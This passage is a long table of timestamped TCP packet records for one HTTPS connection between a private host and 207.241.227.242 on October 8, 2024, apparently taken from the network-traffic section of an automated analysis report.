                                                                                                                                                                                              Oct 8, 2024 15:37:28.943777084 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:28.970572948 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:28.970602989 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:28.970684052 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:28.970684052 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:28.970694065 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.008127928 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016244888 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016278028 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016367912 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016371012 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016371012 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016379118 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016746044 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.016782999 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.017277002 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.017298937 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.017333984 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.017333984 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.017344952 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.018037081 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.018062115 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.018127918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.018127918 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.018135071 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019023895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019043922 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019085884 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019085884 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019094944 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019946098 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019973040 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.019998074 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.020004034 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.020032883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.020032883 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.060980082 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061006069 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061069965 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061084032 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061125040 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061410904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061436892 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061465979 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061471939 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.061512947 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.105101109 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.106681108 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.106719971 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.106772900 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.106774092 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.106791973 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.106832981 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107256889 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107289076 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107335091 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107341051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107408047 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107748032 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107769966 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107808113 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107815027 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.107831001 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.108094931 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.108122110 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.108155966 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.108163118 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.108172894 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.112487078 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.112508059 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.112540960 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.112554073 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.112560034 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.112742901 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.126085997 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.126111031 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.126158953 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.126172066 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.126179934 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.144701958 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.153937101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.153980017 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.154078007 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.154083967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.154083967 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.154109955 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.154167891 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.168410063 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198014975 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198046923 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198131084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198131084 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198142052 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198396921 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198424101 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198461056 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198461056 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198467970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.198488951 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199090958 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199111938 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199142933 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199152946 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199173927 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199570894 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199595928 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199664116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199664116 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199678898 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199724913 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199958086 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.199979067 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.200006962 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.200018883 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.200025082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.216840982 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.216877937 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.216903925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.216912031 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.216933012 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243035078 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243057966 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243108034 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243118048 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243160009 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243362904 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243396044 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243406057 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243419886 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.243449926 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289079905 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289115906 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289190054 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289217949 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289249897 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289644957 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289673090 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289799929 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289799929 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.289807081 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290019035 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290040970 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290272951 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290272951 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290280104 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290376902 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290402889 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290445089 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290445089 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290458918 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290781975 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290803909 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290816069 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290826082 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.290860891 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.308585882 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.308608055 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.308706045 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.308716059 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.308809042 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.319406986 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334265947 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334297895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334342003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334342003 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334355116 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334852934 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334881067 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334918976 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334918976 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334925890 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.334933996 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.379826069 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.379848957 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.379981995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.379981995 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.379996061 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.380655050 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.380682945 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.380726099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.380726099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.380726099 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.380743980 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.381304979 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.381325960 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.381361961 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.381369114 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.381598949 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.381896019 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.381917000 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382018089 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382018089 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382026911 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382081985 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382098913 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382103920 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382132053 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382147074 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382152081 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.382180929 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.398776054 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.398807049 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.398843050 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.398864985 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.398878098 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.425522089 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.425549030 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.425605059 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.425605059 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.425616980 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.425966024 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.425991058 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.426023960 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.426029921 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.426043034 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.471667051 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.471695900 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.471946955 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.471956015 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.471996069 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.471999884 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472062111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472062111 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472239971 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472261906 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472282887 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472289085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472300053 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472708941 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472733021 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472754002 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472759008 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.472770929 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.473102093 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.473123074 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.473155975 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.473169088 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.473212004 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.490091085 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.490125895 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.490185976 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.490185976 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.490194082 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516568899 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516598940 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516679049 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516679049 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516690016 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516855001 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516880989 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516938925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516938925 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.516944885 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.562321901 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.562349081 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.562412977 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.562422037 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.562432051 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563071966 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563097954 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563121080 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563127041 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563162088 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563621998 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563642025 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563754082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563754082 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563762903 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563941956 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.563972950 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564060926 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564060926 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564060926 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564060926 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564060926 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564071894 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564208031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564208031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564208031 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564483881 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564505100 CEST44349166207.241.227.242192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564564943 CEST49166443192.168.2.22207.241.227.242
                                                                                                                                                                                              Oct 8, 2024 15:37:29.564572096 CEST44349166207.241.227.242192.168.2.22
